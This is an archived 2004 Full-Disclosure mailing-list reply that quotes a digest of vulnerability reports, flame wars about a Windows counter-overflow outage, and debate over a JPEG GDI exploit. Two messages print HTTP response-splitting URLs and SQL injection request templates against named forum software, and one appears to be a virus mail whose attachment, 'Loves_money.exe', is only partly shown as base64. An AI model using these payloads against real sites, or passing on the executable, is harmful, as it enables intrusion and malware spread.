[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <814b9d50409271112709f5c13@mail.gmail.com>
From: milw0rm at gmail.com (milw0rm Inc.)
Subject: Re: Full-Disclosure digest, Vol 1 #1933 - 20 msgs
JPEG GDI problem,
Isn't this problem only capable of running if the jpeg was opened via
the users actions?
Is it possible that webpages could be effected with jpegs with
internet explorer viewing them? I wouldn't think so since what I have
read from multiple peoples articles that it isn't this kind of bug.
Info needed.
Regards,
str0ke
On Mon, 27 Sep 2004 12:00:05 -0400,
full-disclosure-request@...ts.netsys.com
<full-disclosure-request@...ts.netsys.com> wrote:
> Send Full-Disclosure mailing list submissions to
> full-disclosure@...ts.netsys.com
>
> To subscribe or unsubscribe via the World Wide Web, visit
> http://lists.netsys.com/mailman/listinfo/full-disclosure
> or, via email, send a message with subject or body 'help' to
> full-disclosure-request@...ts.netsys.com
>
> You can reach the person managing the list at
> full-disclosure-admin@...ts.netsys.com
>
> When replying, please edit your Subject line so it is more specific
> than "Re: Contents of Full-Disclosure digest..."
>
> Today's Topics:
>
> 1. RE: [inbox] Re: [Full-Disclosure] Windoze almost managed to 200x repeat 9/11 (Exibar)
> 2. RE: [inbox] Re: [Full-Disclosure] Windoze almost managed to 200x
> repeat 9/11 (Ron DuFresne)
> 3. RE: Full-Disclosure: JEPG Hype or Hope? (RandallM)
> 4. SANS GDIscan (bashis)
> 5. HTTP Response Splitting and SQL injection in megabbs forum (pigrelax)
> 6. SQL injection in BroadBoard Instant ASP Message Board (pigrelax)
> 7. Re: HTTP Response Splitting and SQL injection in megabbs forum (PD9 Software)
> 8. Re: Re: HTTP Response Splitting and SQL injection in megabbs forum (DanB UK)
> 9. RE: Windoze almost managed to 200x repeat 9/11 (joe)
> 10. Re: Windoze almost managed to 200x repeat 9/11 (Barry Fitzgerald)
> 11. Re: Windoze almost managed to 200x repeat 9/11 (Vince Able)
> 12. Re: Windoze almost managed to 200x repeat 9/11 (ASB)
> 13. RE: Full-Disclosure: JEPG Hype or Hope? (r00t3d)
> 14. Re: Msg reply (Elvi)
> 15. [ GLSA 200409-34 ] X.org, XFree86: Integer and stack overflows in
> libXpm (Thierry Carrez)
> 16. [gentoo-announce] [ GLSA 200409-34 ] X.org, XFree86: Integer and stack overflows in
> libXpm (Thierry Carrez)
> 17. [SECURITY] [DSA 553-1] New getmail packages fix root compromise (debian-security-announce@...ts.debian.org)
>
> --__--__--
>
> Message: 1
> From: "Exibar" <exibar@...lair.com>
> To: "ASB" <abaker@...il.com>, <full-disclosure@...ts.netsys.com>
> Subject: RE: [inbox] Re: [Full-Disclosure] Windoze almost managed to 200x repeat 9/11
> Date: Sun, 26 Sep 2004 12:15:26 -0400
>
> Exactly. Some idiot decided to program the entire system to shut down after
> 49 days. What an idiot, why not just setup a maintenance program to perform
> a scheduled re-boot of the system instead of having an automated proecess
> shut down the system and then have to schedule a work around for this by
> scheduling a manual boot every 30 days (which someone forgot).
>
> This whole thing wasn't Windows' fault, but an idiot
> programmer/manager/whatever fault.
>
> Exibar
>
> > -----Original Message-----
> > From: ASB [mailto:abaker@...il.com]
> > Sent: Sunday, September 26, 2004 10:56 AM
> > To: full-disclosure@...ts.netsys.com
> > Subject: [inbox] Re: [Full-Disclosure] Windoze almost managed to 200x
> > repeat 9/11
> >
> >
> > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> > Next time, please read the thread in context.
> > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> >
> > The context of the thread is that an application issue is being
> > incorrectly interpreted as an OS issue.
> >
> >
> > -ASB
> >
> > On Fri, 24 Sep 2004 14:43:53 -0400, Barry Fitzgerald
> > <bkfsec@....lonestar.org> wrote:
> > > ASB wrote:
> > >
> > > >~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> > > >Where issues like this relate to the OS is in the fact that the OS
> > > >itself shouldn't be brought down by a poorly designed app.
> > > >~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> > > >
> > > >And where in that article did you read that the OS was brought down by
> > > >a poorly designed app?
> > > >
> > > >
> > > >
> > > I didn't... I was reponding to a point that was made about applications
> > > being reponsible for system failures.
> > >
> > > >
> > > >~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> > > >
> > > >
> > > >>Was it MS Windows that actually held the code that brought
> > the system down?
> > > >>
> > > >>
> > > >~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> > > >
> > > >The article was pretty clear:
> > > >
> > > ><snip>
> > > >
> > > >How you managed to read "OS failure" into this is rather astounding...
> > > >
> > > >
> > > >
> > > >
> > > How you manage to get up in the morning is rather astounding.
> > >
> > > Next time, please read the thread in context.
> > >
> > > Also, if you think that that's a detailed assessment of the problem,
> > > you're not too bright.
> > >
> > > So try and think a little harder next time, and not be so abbrassive.
> > > You may be having a bad day (most likely due to your poor attitude) but
> > > don't take your own misunderstanding out on others, mmkay?
> > >
> > > -Barry
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.netsys.com/full-disclosure-charter.html
> >
> >
> >
>
> --__--__--
>
> Message: 2
> Date: Sun, 26 Sep 2004 11:48:22 -0500 (CDT)
> From: Ron DuFresne <dufresne@...ternet.com>
> To: Exibar <exibar@...lair.com>
> cc: ASB <abaker@...il.com>, <full-disclosure@...ts.netsys.com>
> Subject: RE: [inbox] Re: [Full-Disclosure] Windoze almost managed to 200x
> repeat 9/11
>
> On Sun, 26 Sep 2004, Exibar wrote:
>
> > Exactly. Some idiot decided to program the entire system to shut down after
> > 49 days. What an idiot, why not just setup a maintenance program to perform
> > a scheduled re-boot of the system instead of having an automated proecess
> > shut down the system and then have to schedule a work around for this by
> > scheduling a manual boot every 30 days (which someone forgot).
> >
>
> Which, likely in this case, would have to somehow be monitored, seems to
> be a pretty critical application, one in which lives are dependant, and it
> is entirely possible the system might not recover from a reboot.
>
> Thanks,
>
> Ron DuFresne
> --
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> "Cutting the space budget really restores my faith in humanity. It
> eliminates dreams, goals, and ideals and lets us get straight to the
> business of hate, debauchery, and self-annihilation." -- Johnny Hart
> ***testing, only testing, and damn good at it too!***
>
> OK, so you're a Ph.D. Just don't touch anything.
>
> --__--__--
>
> Message: 3
> From: "RandallM" <randallm@...mail.com>
> To: <full-disclosure@...ts.netsys.com>
> Date: Sun, 26 Sep 2004 12:02:20 -0500
> Subject: [Full-Disclosure] RE: Full-Disclosure: JEPG Hype or Hope?
>
> What exactly would one gain by creating a PoC on this exploit?
> How exactly does this compare to meaningful disclosures that were
> revealed because someone would not listen or ignored the warnings
> of their security vulnerability.
>
> I mean, this is nothing like a program goof that allows clear-text
> Passwords or exposes files or the like. This exploit (if it can be
> called that) took a lot of thought to create it and exploit it.
>
> Correct me if I'm wrong but it does not fall in to the category
> of "exploit" as defined by this list. This was truly a "created Exploit"
> that would not be their otherwise. This took intelligent input.
>
> This is nothing more then a black-hat attack. It is not a meaningful
> revealing of poor security as I've seen defined on this list.
>
> <|>-- __--__--
> <|>
> <|>Message: 13
> <|>From: "i.t " <fulldis@...7.dyndns.org>
> <|>Organization: i.t consulting
> <|>To: full-disclosure@...ts.netsys.com
> <|>Date: Sun, 26 Sep 2004 11:57:33 +0200
> <|>Subject: [Full-Disclosure] Re: MS04-028 Jpeg EXPLOIT - msn
> <|>
> <|>
> <|>> On Saturday 25 September 2004 16:59, raza wrote:
> <|>> > I just compiled this and it works well..
> <|>> >
> <|> ...
> <|>> yes and it works very well.
> <|>> > I can see this ones gaana be fun...
> <|>> We'll have a worm within days.
>
> <|>
> <|>for nearly all of my clients using win xp I've deinstalled
> <|>win messenger.
> <|>one urgently wanted it back for communicating in real-time;
> <|>and, of course,
> <|>it's much more fun seeing a live picture of the
> <|>counterpart(s) in the chat
> <|>window...
> <|>
> <|>even having installed sp2 and the newest patches plus AV I
> <|>can imagine a virus
> <|>spreading within those pictures throughout the whole msn and so on...
> <|>any other defense?
> <|>or ist this too much paranoia?
> <|>
> <|>i.t
> <|>
> <|>
> <|>-- __--__--
>
> --__--__--
>
> Message: 4
> To: full-disclosure@...ts.netsys.com
> Date: Sun, 26 Sep 2004 17:34:04 +0200 (CEST)
> From: bashis <mcw@....se>
> Reply-To: mcw@....se
> Subject: [Full-Disclosure] SANS GDIscan
>
> Hi
>
> I tested [1] 'gdiscan' from SANS, and this tool reports vulnerable DLL's after
> installing all availible patches from M$..
>
> WinXP Pro SP1
> C:\WINDOWS\system32\gdiplus.dll
> Version: 5.1.3097.0 <-- Vulnerable version
>
> Win2k Server SP4
> C:\Program Files\Common Files\Microsoft Shared\Ink\gdiplus.dll
> Version: 5.1.3097.0 <-- Vulnerable version
>
> [1]
> http://isc.sans.org/gdiscan.php
>
> Have a nice day
> /bashis
>
> --__--__--
>
> Message: 5
> From: "pigrelax" <pigrelax@...dex.ru>
> To: <full-disclosure@...ts.netsys.com>
> Cc: <bugtraq@...urityfocus.com>, <info@...soft.com>
> Date: Sun, 26 Sep 2004 21:56:44 +0400
> Subject: [Full-Disclosure] HTTP Response Splitting and SQL injection in megabbs forum
>
> URL: http://www.pd9soft.com
> Tested megabbs 2.1
>
> 1. HTTP Response Splitting
> http://www.pd9soft.com/megabbs/forums/thread-post.asp?action=writenew&fid=%0
> d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0aContent-Type:%20
> text/html%0d%0aContent-Length:%2033%0d%0a%0d%0a%3chtml%3eScanned%20by%20Maxp
> atrol%3c/html%3e%0d%0a&tid=4924&replyto=22947&displaytype=flat
>
> Result:
>
> <...>
> HTTP/1.1 302 Object moved
> Connection: close
> Date: Sun, 26 Sep 2004 14:14:02 GMT
> Server: Microsoft-IIS/6.0
> Location: /megabbs/forums/forum-view.asp?fid=
> Content-Length: 0
>
> HTTP/1.0 200 OK
> Content-Type: text/html
> Content-Length: 33
>
> <html>Scanned by Maxpatrol</html>
>
> Content-Length: 290
> Content-Type: text/html
> Expires: Sun, 26 Sep 2004 14:13:02 GMT
> Set-Cookie: guestID=309; path=/
> Set-Cookie: ASPSESSIONIDAQRTADCB=KNEIJIEDEMJPNNKPNFONOIFL; path=/
> Cache-contro
> <...>
>
> 2. HTTP Response Splitting
> http://www.pd9soft.com/megabbs/forums/thread-post.asp?fid=%0d%0aContent-Leng
> th:%200%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aC
> ontent-Length:%2033%0d%0a%0d%0a%3chtml%3eScanned%20by%20Maxpatrol%3c/html%3e
> %0d%0a&action=writenew&displaytype=flat
>
> Result:
> <...>
> HTTP/1.1 302 Object moved
> Connection: close
> Date: Sun, 26 Sep 2004 14:34:05 GMT
> Server: Microsoft-IIS/6.0
> Location: /megabbs/forums/forum-view.asp?fid=
> Content-Length: 0
>
> HTTP/1.0 200 OK
> Content-Type: text/html
> Content-Length: 33
>
> <html>Scanned by Maxpatrol</html>
>
> Content-Length: 290
> Content-Type: text/html
> Expires: Sun, 26 Sep 2004 14:33:05 GMT
> Set-Cookie: guestID=421; path=/
> Set-Cookie: ASPSESSIONIDAQRTADCB=HCGIJIEDMBPIHPCDJFKACJAC; path=/
> Cache-contro
> <...>
>
> 3. More and more SQL injection:
> ladder-log.asp?categoryid=1&sortby=completeddate&sortdir=1'
> ladder-log.asp?categoryid=1&filter=id&criteria=1'
> view-profile.asp?type=single&memberid=1'
> view-profile.asp?type=team&teamid=1'
>
> MaxPatrol is a professional network security scanner distinguished by its
> uncompromisingly high quality of scanning, optimized for effective use by
> companies of any size (serving from a few to tens of thousands of nodes).
> MaxPatrol developers were able quite simply to "ignore" about 40% of the
> newly published vulnerabilities because their product's intelligent
> algorithms had already detected them.
> http://www.Maxpatrol.com
>
> --__--__--
>
> Message: 6
> From: "pigrelax" <pigrelax@...dex.ru>
> To: <full-disclosure@...ts.netsys.com>
> Cc: <bugtraq@...urityfocus.com>
> Date: Mon, 27 Sep 2004 00:09:32 +0400
> Subject: [Full-Disclosure] SQL injection in BroadBoard Instant ASP Message Board
>
> BroadBoard Instant ASP Message Board
>
> URL: http://www.broadboard.com/
>
> 1. software does not properly validate user-supplied input in the 'keywords'
> parameter in search.asp:
> http://broadboard/forum/search.asp?archives=1&action=1&keywords=['SQL
> code]&method=1&method=1&body=1&subject=1&board=1&results=1
>
> 2. software does not properly validate user-supplied input in the 'handle'
> parameter in profile.asp:
> http://broadboard/forum/profile.asp?handle=['SQL code]
>
> 3. software does not properly validate user-supplied input in the
> 'txtUserHandle' parameter in reg2.asp:
>
> POST /forum/reg2.asp HTTP/1.1
> Host: broadboard
> Content-Type: application/x-www-form-urlencoded
> Content-Length: 121
> txtNameFirst=1&txtNameLast=1&txtUserEmail=sales@...patrol.com&txtUserHandle=
> ['SQL code]&txtUserPwd=1&txtUserCPwd=1&cmdRegister=1
>
> 4. software does not properly validate user-supplied input in the
> 'txtUserEmail' parameter in forgot.asp:
>
> POST /forum/forgot.asp HTTP/1.1
> Host: broadboard
> Content-Type: application/x-www-form-urlencoded
> Content-Length: 24
> txtUserEmail=['SQL code]&cmdSend=1
>
> MaxPatrol is a professional network security scanner distinguished by its
> uncompromisingly high quality of scanning, optimized for effective use by
> companies of any size (serving from a few to tens of thousands of nodes).
> MaxPatrol developers were able quite simply to "ignore" about 40% of the
> newly published vulnerabilities because their product's intelligent
> algorithms had already detected them.
> http://www.Maxpatrol.com
>
> --__--__--
>
> Message: 7
> Date: Sun, 26 Sep 2004 13:50:50 -0500
> From: PD9 Software <info@...soft.com>
> CC: full-disclosure@...ts.netsys.com, bugtraq@...urityfocus.com
> Subject: [Full-Disclosure] Re: HTTP Response Splitting and SQL injection in megabbs forum
>
> pigrelax wrote:
>
> >URL: http://www.pd9soft.com
> >Tested megabbs 2.1
> >
> >1. HTTP Response Splitting
> >2. HTTP Response Splitting
> >3. More and more SQL injection:
> >
>
> All three issues have been addressed, and updates have been posted at
> http://www.pd9soft.com/. Thank you for bringing them to my attention.
>
> However in the future, would it be too much to ask that I am contacted
> first? I am very eager to fix any security vulnerabilities, but sipping
> coffee on a lazy Sunday afternoon and seeing this broadcast to a public
> list is a little disconcerting.
>
> Thanks,
> Matt Summers
> PD9 Software, Inc
>
> --__--__--
>
> Message: 8
> Date: Sun, 26 Sep 2004 23:12:42 +0100
> From: DanB UK <danbuk@...il.com>
> Reply-To: DanB UK <danbuk@...il.com>
> To: full-disclosure@...ts.netsys.com
> Subject: Re: [Full-Disclosure] Re: HTTP Response Splitting and SQL injection in megabbs forum
>
> It seems like the OP was actually just trying to advertise their(or
> affiliates) product.
> I would say that its not the 'done' thing.
> > However in the future, would it be too much to ask that I am contacted
> > first? I am very eager to fix any security vulnerabilities, but sipping
> > coffee on a lazy Sunday afternoon and seeing this broadcast to a public
> > list is a little disconcerting.
> I understand your concern.
>
> Regards,
> Daniel
> --
> DanB UK
> London, UK
>
> --__--__--
>
> Message: 9
> From: "joe" <mvp@...ware.net>
> To: "'devis'" <devis@...ynix.net>
> Cc: <full-disclosure@...ts.netsys.com>
> Subject: RE: [Full-Disclosure] Windoze almost managed to 200x repeat 9/11
> Date: Sun, 26 Sep 2004 18:42:29 -0400
>
> I get paid nothing to hang out on this list. In fact many of my friends feel
> I am wasting considerable time here because the vast majority of the people
> are Linux bigots simply holding each others', ummm, hands.
>
> Once in a while though some seriously good information or conversation
> occurs here which is why I like to hang out and most of my responses tend to
> be offlist. Occasionally I like to dampen some of the occasional this or
> that about how bad Windows sucks from people who don't know enough about how
> it works to even have a very good opinion. They are intelligent people
> mostly, they just have a hamster up their bum about billg or MS for some
> reason.
>
> It is funny to me how this thread came onto the list as a "Windows sucks"
> thread when it should have been a serious, "some programmers don't
> understand data types sucks" thread. It is poor programming habits like this
> that cause a great deal of the flaws in apps and OSes that others take
> advantage of. Programmers need to understand the proper way to handle the
> datatypes they use in their applications, whether it be checking for data
> size constraints or data range constraints.
>
> As for missing out on cash or something from MS, I am not so sure MS would
> have me as an employee at the moment as I spend considerable time banging on
> them and their OS and choices. I don't do it out in the public lists like
> this as I am trying to be a rightous d00d to all of you cool people. I bang
> on them in the private groups that have MS people seriously looking to make
> things better.
>
> For this specific thread, my main point is that someone who can't figure out
> that an unsigned integer value that is incrementing will roll at some point
> is a dangerous programmer no matter what OS they are on. This has nothing to
> do with Windows or any OS. It is how computers work period. There isn't a
> single OS out there that you could constantly increment a 32 bit unsigned
> counter and not roll to zero. This is way below anything the OS can control.
> At best it halts the program as soon as the overflow kicks. That really
> wouldn't help much except possibly with data corruption. I don't think an OS
> should protecting apps from data corruption due to the app losing count
> though.
>
> joe
>
> -----Original Message-----
> From: full-disclosure-admin@...ts.netsys.com
> [mailto:full-disclosure-admin@...ts.netsys.com] On Behalf Of devis
> Sent: Saturday, September 25, 2004 12:49 PM
> Cc: full-disclosure@...ts.netsys.com
> Subject: Re: [Full-Disclosure] Windoze almost managed to 200x repeat 9/11
>
> Joe dude, how much u are getting from M$ a month to hang around this list ?
> Zero ? Noway....send em a letter now dude.
> And please don't serve me, 'just being objective crap', you HAVE to be
> interested to defend it that well., if not, well, you may be missing on
> something...
>
> joe wrote:
>
> >Definitely some interesting theories Ron.
> >
> >
> >
> >>1> the code was better done under the original OS, unix
> >>
> >>
> >
> >While possible, nothing actually points at this as being the case.
> >Anyway, I would be curious as to the functionality of the system when
> >it was first launched on UNIX versus the end-result. Put this on
> >Windows and run it 10 years and then port to UNIX or *nix and there
> >will almost certainly be screwups there as well. In fact, I would be
> >pretty confident. I have dealt with poor ports to and from Windows and
> >*nix. I have even dealt with bad ports from Mainframes to UNIX where
> >the whole time the Mainframe people were saying the same types of
> >things about UNIX that you like to say about Windows. Being a good
> >coder for one OS doesn't make you one for all Oses when dealing with system
> level components and interfaces.
> >
> >
> >
> >
> >>2> considering "how often" you seems to run into this same
> >>issue with other coders in the windows realm, windows coders tend to
> >>be especially lazy/clueless as compared to coders in other OS'
> >>
> >>
> >
> >I would expect the issue is the same as always. Sheer volume. There are
> >good and bad coders period. Microsoft has surely drawn more poor coders
> >than any other OS with its pushing of the RAD/simple coding environment
> such as VB.
> >Additionally the Windows environment as a whole has more inexperienced
> >users and admins and people likely to try and code. There are also many
> >good ones as well, they are just well buried in the poor ones.
> >
> >
> >
> >
> >>3> tools to code with in the windows realm are not as
> >>3> developed/functional
> >>as they are in other envs
> >>
> >>
> >
> >I would say this opinion is uninformed.
> >
> >
> >
> >
> >>4> M$ does not properly provide developers with clued information with
> >>which to do their jobs
> >>
> >>
> >
> >This is another opinion which I would call rather uninformed.
> >
> >Even if there was poor function documentation, if you have a function,
> >any function returning a constantly increasing counter you know, as a
> >skilled programmer, that eventually it has to do something other than
> >increase. If the value is signed the sign bit will flip or if it is
> >unsigned it will roll to 0. How can a good programmer think any other
> >thing? The compiler could have inserted exception handling code but at
> >best that is simply going to bounce the program out of a normal running
> >state. That is a compiler thing though, not an OS thing. I do hope you
> >aren't trying to tell me that UNIX can magically and infinitely
> >maintain a counter on a variable with a fixed bit size. I try to consider
> you to be a bit more intelligent than that.
> >
> >
> >
> >To put it in anotehr way, if you have a set of tires on a car that are
> >rated for 75 MPH (say off road truck tires) and some person goes 90 and
> >the tires fly apart or the vehicle flips or both, is the issue the
> >driver, the vehicle manufacturer, the tire manufacturer, or the tree
> >that produced the rubber for the tire? This is the same sort of case.
> >You have it in your mind ahead of time who you want to be at fault
> >because you have a bug up your bum about it and work to prove that stance.
> >
> >Poor coding is a result of poor coders. I have seen amazingly bad code
> >on all OS/RTS platforms I have worked on from RSTS to BSD to Linux to
> >Windows to DOS to VMS. I have also seen some amazingly good stuff on
> >the same platforms. Someone who doesn't understand basic data types and
> >how to handle their limits is going to do a shitty job on all of the
> platforms.
> >
> >Is the ratio of good admins to bad admins better in UNIX versus Windows?
> >Absolutely. Is the ratio of good programmers to bad programmers better
> >in UNIX versus Windows? Most certainly. Does this mean all Windows
> >admins are bad admins, obviously not. Does this mean all Windows
> >programmers are bad programmers, obviously not. I specifically say UNIX
> >versus *nix because I think *nix is one or more steps closer to Windows
> >in this discussion and getting closer as its popularity grows with
> >Windows users. Switching to *nix doesn't make the admins or coders
> >switching (or just using in tandem) any better simply because they
> switched.
> >
> >
> >
> >
> >
> >
> >
> >-----Original Message-----
> >From: Ron DuFresne [mailto:dufresne@...ternet.com]
> >Sent: Friday, September 24, 2004 11:25 PM
> >To: joe
> >Cc: mcw@....se; full-disclosure@...ts.netsys.com
> >Subject: RE: [Full-Disclosure] Windoze almost managed to 200x repeat
> >9/11
> >
> >On Fri, 24 Sep 2004, joe wrote:
> >
> >
> >
> >>Again, there are valid uses of GetTickCount and there are safe ways of
> >>doing so. If there is concern, I do recommend testing functionality
> >>associated with each of the DLLs. You might find a bug you can report
> >>for
> >>
> >>
> >kudos.
> >
> >
> >>On the incident, I would guess the vendor never had a clue it would do
> >>
> >>
> >that.
> >
> >
> >>That function can't return more than 49.7 days without breaking every
> >>app that currently uses it. MS can not do that. That is why there is
> >>another function to get the info with a different datatype. See my
> >>other
> >>
> >>
> >posts.
> >
> >
> >
> >What seems to read clearly from your replies to this thread is that
> >either;
> >
> >1> the code was better done under the original OS, unix
> >
> >2> considering "how often" you seems to run into this same issue with
> >other coders in the windows realm, windows coders tend to be especially
> >lazy/clueless as compared to coders in other OS'
> >
> >3> tools to code with in the windows realm are not as
> >3> developed/functional
> >as they are in other envs
> >
> >4> M$ does not properly provide developers with clued information with
> >which to do their jobs
> >
> >
> >>From which you can combine any or all of the above for a correct
> >interpretation of the total of your replies.
> >
> >Thanks,
> >
> >Ron DuFresne
> >--
> >~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> >"Cutting the space budget really restores my faith in humanity. It
> >eliminates dreams, goals, and ideals and lets us get straight to the
> >business of hate, debauchery, and self-annihilation." -- Johnny Hart
> > ***testing, only testing, and damn good at it too!***
> >
> >OK, so you're a Ph.D. Just don't touch anything.
> >
> >_______________________________________________
> >Full-Disclosure - We believe in it.
> >Charter: http://lists.netsys.com/full-disclosure-charter.html
> >
> >
> >
> >
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>
> --__--__--
>
> Message: 10
> Date: Sun, 26 Sep 2004 20:41:34 -0400
> From: Barry Fitzgerald <bkfsec@....lonestar.org>
> To: ASB <abaker@...il.com>
> CC: full-disclosure@...ts.netsys.com
> Subject: Re: [Full-Disclosure] Windoze almost managed to 200x repeat 9/11
>
> ASB wrote:
>
> >~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> >Next time, please read the thread in context.
> >~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> >
> >The context of the thread is that an application issue is being
> >incorrectly interpreted as an OS issue.
> >
> >
> >
> >
>
> Oversimplification is for the foolish. Like I said, you're not too bright.
>
> You're showing very little understanding of system architecture here.
> My point regarding where the code was located had to do with a
> generalized statement regarding applications being at fault for issues
> and for them not being OS issues. My point was that it's not always
> clear cut.
>
> I was not trying to say that this case was an OS issue. I was trying to
> say that the line is not always black and white. I was also pointing
> out that none of us know because the only information we have to go on
> is third-hand and imprecise. If you can predict conditions based on
> imprecise third-hand information, then what are you doing here?!? Go
> solve the world's problems or something. of course, you can't so you've
> decided to just flame people.
>
> Please re-read my posts and think before you respond.
>
> If, besides misreading my posts, you can find no argument with what I've
> said (which, you won't, because I'm right) then I'm willing to hear
> them. Other than that, you're just wasting everyone's time by trying to
> railroad points that you don't understand.
>
> -Barry
>
> --__--__--
>
> Message: 11
> From: "Vince Able" <we_hate_vince@...mail.com>
> To: <full-disclosure@...ts.netsys.com>
> Subject: Re: [Full-Disclosure] Windoze almost managed to 200x repeat 9/11
> Date: Sun, 26 Sep 2004 21:24:27 -0400
> Organization: The Ram Group
>
> Well what a nice first post to read entering Full-Disclosure. LoL
> ----- Original Message -----
> From: "Barry Fitzgerald" <bkfsec@....lonestar.org>
> To: "ASB" <abaker@...il.com>
> Cc: <full-disclosure@...ts.netsys.com>
> Sent: Sunday, September 26, 2004 8:41 PM
> Subject: Re: [Full-Disclosure] Windoze almost managed to 200x repeat 9/11
>
> > ASB wrote:
> >
> > >~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> > >Next time, please read the thread in context.
> > >~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> > >
> > >The context of the thread is that an application issue is being
> > >incorrectly interpreted as an OS issue.
> > >
> > >
> > >
> > >
> >
> > Oversimplification is for the foolish. Like I said, you're not too
> bright.
> >
> > You're showing very little understanding of system architecture here.
> > My point regarding where the code was located had to do with a
> > generalized statement regarding applications being at fault for issues
> > and for them not being OS issues. My point was that it's not always
> > clear cut.
> >
> > I was not trying to say that this case was an OS issue. I was trying to
> > say that the line is not always black and white. I was also pointing
> > out that none of us know because the only information we have to go on
> > is third-hand and imprecise. If you can predict conditions based on
> > imprecise third-hand information, then what are you doing here?!? Go
> > solve the world's problems or something. of course, you can't so you've
> > decided to just flame people.
> >
> > Please re-read my posts and think before you respond.
> >
> > If, besides misreading my posts, you can find no argument with what I've
> > said (which, you won't, because I'm right) then I'm willing to hear
> > them. Other than that, you're just wasting everyone's time by trying to
> > railroad points that you don't understand.
> >
> > -Barry
> >
> >
> >
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.netsys.com/full-disclosure-charter.html
> >
>
> --__--__--
>
> Message: 12
> Date: Sun, 26 Sep 2004 22:36:12 -0400
> From: ASB <abaker@...il.com>
> Reply-To: ASB <abaker@...il.com>
> To: full-disclosure@...ts.netsys.com
> Subject: Re: [Full-Disclosure] Windoze almost managed to 200x repeat 9/11
>
> There was more than enough information provided in the initial link,
> besides what was available to those who took a moment or 3 to search
> for additional info, to avoid coming to the conclusion that the OS was
> the fault here.
>
> The mere fact that thousands, if not millions of people manage to run
> Windows 2000 systems which do not keel over every 49.7 days, would
> tend to cause one to look elsewhere for the source of the issue.
> Beyond that, the wording of the various articles on this issue that I
> looked at, made it rather obvious that there was an issue with the
> APPLICATION which rendered it useless if certain operator steps were
> not performed. No matter how scanty you feel the articles were, they
> never even implied that the OS was inoperable during any of this.
>
> While it is certainly important to have as much information as
> possible before rendering verdicts of any sort, and while not every
> issue can be definitively outlined as jet black or lily white, there's
> not a whole lot more forensics that's needed to conclude that the root
> of the issue is one of application development, compounded by the
> failure of an operator to perform a prescribed workaround at the
> appointed time.
>
> The irony here is that you're accusing me of not reading or comprehending.
>
> -ASB
>
> On Sun, 26 Sep 2004 20:41:34 -0400, Barry Fitzgerald
> <bkfsec@....lonestar.org> wrote:
> > ASB wrote:
> >
> > >~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> > >Next time, please read the thread in context.
> > >~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> > >
> > >The context of the thread is that an application issue is being
> > >incorrectly interpreted as an OS issue.
> > >
> > >
> > >
> > >
> >
> > Oversimplification is for the foolish. Like I said, you're not too bright.
> >
> > You're showing very little understanding of system architecture here.
> > My point regarding where the code was located had to do with a
> > generalized statement regarding applications being at fault for issues
> > and for them not being OS issues. My point was that it's not always
> > clear cut.
> >
> > I was not trying to say that this case was an OS issue. I was trying to
> > say that the line is not always black and white. I was also pointing
> > out that none of us know because the only information we have to go on
> > is third-hand and imprecise. If you can predict conditions based on
> > imprecise third-hand information, then what are you doing here?!? Go
> > solve the world's problems or something. of course, you can't so you've
> > decided to just flame people.
> >
> > Please re-read my posts and think before you respond.
> >
> > If, besides misreading my posts, you can find no argument with what I've
> > said (which, you won't, because I'm right) then I'm willing to hear
> > them. Other than that, you're just wasting everyone's time by trying to
> > railroad points that you don't understand.
> >
> > -Barry
>
> --__--__--
>
> Message: 13
> Date: Sun, 26 Sep 2004 22:20:29 -0700
> From: r00t3d <r00t3d@...il.com>
> Reply-To: r00t3d <r00t3d@...il.com>
> To: randallm@...mail.com, full-disclosure@...ts.netsys.com
> Subject: [Full-Disclosure] RE: Full-Disclosure: JEPG Hype or Hope?
>
> Dear RandallM,
>
> >This exploit (if it can becalled that) took a lot of thought to
> create it and exploit it.
>
> Yea, lots of thought, and ripped shellcode to boot! Can't beat that can ya?
>
> >Correct me if I'm wrong but it does not fall in to the category
> >of "exploit" as defined by this list.
>
> Okay, you're wrong.
>
> >This was truly a "created Exploit"
>
> Seriously? I didn't know exploits were "created" I always thought they
> just appeared.
>
> >This is nothing more then a black-hat attack. It is not a meaningful
> >revealing of poor security as I've seen defined on this list.
> Uh oh, are the blaqhats after us again?? I think we had all better
> just pull our whitehats down over our heads and hope they go away. I
> hear, if you don't move, the blaqhats won't notice you and will leave,
> kind of like with bears. Anyways, last time I checked, it was't
> blaqhats that disclosed exploits, it was whitehats and scene whores.
>
> Love,
> #MSNetworks
>
> --__--__--
>
> Message: 14
> Date: Mon, 27 Sep 2004 09:03:35 +0200
> To: "Full-disclosure" <full-disclosure@...ts.netsys.com>
> From: "Elvi" <elvi52001@...oo.com>
> Subject: [Full-Disclosure] Re: Msg reply
>
> ----------tthzhwewredcturxosqp
> Content-Type: text/html; charset="us-ascii"
> Content-Transfer-Encoding: 7bit
>
> <html><body>
>
> <br>
> </body></html>
>
> ----------tthzhwewredcturxosqp
> Content-Type: application/octet-stream; name="Loves_money.exe"
> Content-Transfer-Encoding: base64
> Content-Disposition: attachment; filename="Loves_money.exe"
>
> TVoAAAEAAAACAAAA//8AAEAAAAAAAAAAQAAAAAAAAAC0TM0hAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAkAAAAKkm3RPtR7NA7UezQO1Hs0DtR7NA7kezQGNYoEBtR7NAEWehQOxHs0AqQbVA
